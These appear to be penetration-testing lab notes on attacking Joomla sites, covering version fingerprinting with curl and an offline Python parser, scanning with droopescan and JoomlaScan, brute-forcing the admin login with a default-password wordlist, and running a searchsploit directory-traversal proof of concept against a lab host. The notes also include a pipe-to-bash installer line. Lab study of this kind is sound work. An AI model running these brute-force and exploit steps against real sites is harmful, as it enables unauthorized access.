Joomla

Joomla, released in August 2005, is another free and open-source CMS used for discussion forums, photo galleries, e-commerce, user-based communities, and more. It is written in PHP and uses MySQL as its backend. Like WordPress, Joomla can be extended with over 7,000 extensions and over 1,000 templates. There are up to 2.5 million sites on the internet running Joomla. Here are some interesting statistics about Joomla:

  • Joomla accounts for 3.5% of the CMS market share

  • Joomla is 100% free and means "all together" in Swahili (phonetic spelling of "Jumla")

  • The Joomla community has close to 700,000 members in its online forums

  • Joomla powers 3% of all websites on the internet, nearly 25,000 of the top 1 million sites worldwide (just 10% of the reach of WordPress)

  • Some notable organizations that use Joomla include eBay, Yamaha, Harvard University, and the UK government

  • Over the years, 770 different developers have contributed to Joomla

Joomla collects some anonymous usage statistics such as the breakdown of Joomla, PHP and database versions and server operating systems in use on Joomla installations. This data can be queried via their public API.

Querying this API, we can see over 2.7 million Joomla installs!

HackJiji@htb[/htb]$ curl -s https://developer.joomla.org/stats/cms_version | python3 -m json.tool

Enumeration (manually)

Identify Joomla

curl -s http://dev.inlanefreight.local/ | grep Joomla

Fingerprint Joomla version

curl -s http://dev.inlanefreight.local/README.txt | head -n 5
The version can also be fingerprinted from the JavaScript files in the media/system/js/ directory, or by browsing to administrator/manifests/files/joomla.xml:
curl -s http://dev.inlanefreight.local/administrator/manifests/files/joomla.xml | xmllint --format -
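An added example (not part of these notes) that performs the same fingerprinting programmatically, which is handy when checking your own Joomla sites for version disclosure. It parses constructed sample responses for the three paths requested above; nothing is contacted over the network, and `fetch_sample` stands in for the HTTP request.

```python
import re
import xml.etree.ElementTree as ET

# Constructed sample responses standing in for an HTTP GET against the site.
# The paths are the ones the curl commands above request; the bodies mimic Joomla 3.x.
SAMPLE_RESPONSES = {
    "/": '<html><head><meta name="generator" content="Joomla! - Open Source '
         'Content Management" /></head><body></body></html>',
    "/README.txt": "1- What is this?\n\t* This is a Joomla! installation/upgrade "
                   "package to version 3.x\n",
    "/administrator/manifests/files/joomla.xml": (
        '<?xml version="1.0" encoding="UTF-8"?>\n'
        '<extension version="3.6" type="file" method="upgrade">\n'
        "  <name>files_joomla</name>\n  <version>3.9.4</version>\n"
        "  <creationDate>March 2019</creationDate>\n</extension>\n"
    ),
}

def fetch_sample(path):
    """Offline stand-in for an HTTP GET; None plays the role of a 404."""
    return SAMPLE_RESPONSES.get(path)

def is_joomla(index_html):
    """Same marker that 'grep Joomla' on the front page matches: the generator meta tag."""
    return bool(re.search(r'<meta name="generator" content="Joomla!', index_html or "", re.I))

def version_from_readme(text):
    """README.txt only reveals the branch ('3.x'), never the exact release."""
    m = re.search(r"package to version (\d+\.x)", text or "")
    return m.group(1) if m else None

def version_from_manifest(xml_text):
    """joomla.xml carries the exact release in <version>; the version= attribute on
    <extension> is the manifest schema version, not the CMS version."""
    try:
        root = ET.fromstring(xml_text or "")
    except ET.ParseError:
        return None
    el = root.find("version")
    return el.text.strip() if el is not None and el.text else None

def fingerprint(fetch):
    """Run the checks in order of precision and report which file disclosed the version."""
    if not is_joomla(fetch("/")):
        return None
    exact = version_from_manifest(fetch("/administrator/manifests/files/joomla.xml"))
    if exact:
        return {"version": exact, "source": "joomla.xml"}
    branch = version_from_readme(fetch("/README.txt"))
    return {"version": branch, "source": "README.txt" if branch else None}
```

If joomla.xml is blocked but README.txt is still readable, the result degrades to the branch only, which is exactly what the manifest check adds over the README check.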

Enumeration & Attacks using automated tools

  • Droopescan:

sudo pip3 install droopescan
droopescan scan joomla --url http://dev.inlanefreight.local/
  • JoomlaScan:

Python 2.7 Installation:

#Requires python 2.7 (installed here via pyenv):
curl https://pyenv.run | bash
echo 'export PYENV_ROOT="$HOME/.pyenv"' >> ~/.bashrc
echo 'command -v pyenv >/dev/null || export PATH="$PYENV_ROOT/bin:$PATH"' >> ~/.bashrc
echo 'eval "$(pyenv init -)"' >> ~/.bashrc
source ~/.bashrc
pyenv install 2.7

pyenv shell 2.7

python2.7 -m pip install urllib3
python2.7 -m pip install certifi
python2.7 -m pip install bs4

Tool usage:

python2.7 joomlascan.py -u http://dev.inlanefreight.local

Bruteforce Joomla login credentials

git clone https://github.com/ajnik/joomla-bruteforce.git

sudo python3 joomla-brute.py -u http://dev.inlanefreight.local -w /usr/share/metasploit-framework/data/wordlists/http_default_pass.txt -usr admin

After logging in to the Joomla application, if you receive an error stating "An error has occurred. Call to a member function format() on null", navigate to "http://dev.inlanefreight.local/administrator/index.php?option=com_plugins" and disable the "Quick Icon - PHP Version Check" plugin. This will allow the control panel to display properly.

Search for known exploits based on the version identified with searchsploit:

#search for a known exploit 
searchsploit joomla 3.0

#copy the poc to home folder
searchsploit -m 4578

#run the script as shown in the following example
python2.7 joomla_dir_trav.py --url "http://dev.inlanefreight.local/administrator/" --username admin --password admin --dir 
